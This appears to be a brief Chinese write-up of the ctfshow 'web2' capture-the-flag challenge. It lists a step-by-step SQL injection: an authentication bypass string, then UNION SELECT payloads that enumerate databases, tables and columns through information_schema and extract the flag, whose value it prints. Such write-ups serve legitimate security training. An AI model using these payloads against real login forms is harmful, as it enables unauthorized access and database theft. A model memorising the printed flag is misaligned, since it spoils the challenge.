ctfshow web2

一道sql注入题

进去输入万能密码试一下啊

用户名：admin' or 1=1#

密码随便填一个就可以了

显示成功

说明可以sql注入

admin' or 1=1 union order by 1# 测试列数量

admin' or 1=1 union select 1,2,3# 测试回显位置

admin' or 1=1 union select 1,group_concat(schema_name),3 from information_schema.schemata# 获得所有数据库名称

admin' or 1=1 union select 1,database(),3# 获取当前数据库名称

admin' or 1=1 union select group_concat(table_name),3 from information_schema.tables where table_schema='web2'#  获取web2这一数据库下的数据库表面

得到flag和user这两个数据库表名

admin' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'# 获取flag表中的字段

admin' or 1=1 union select 1,flag,3 from flag# 获取flag

 得到flag：ctfshow{19f0e9b9-1182-4e8c-9e0d-8b796d4406a1}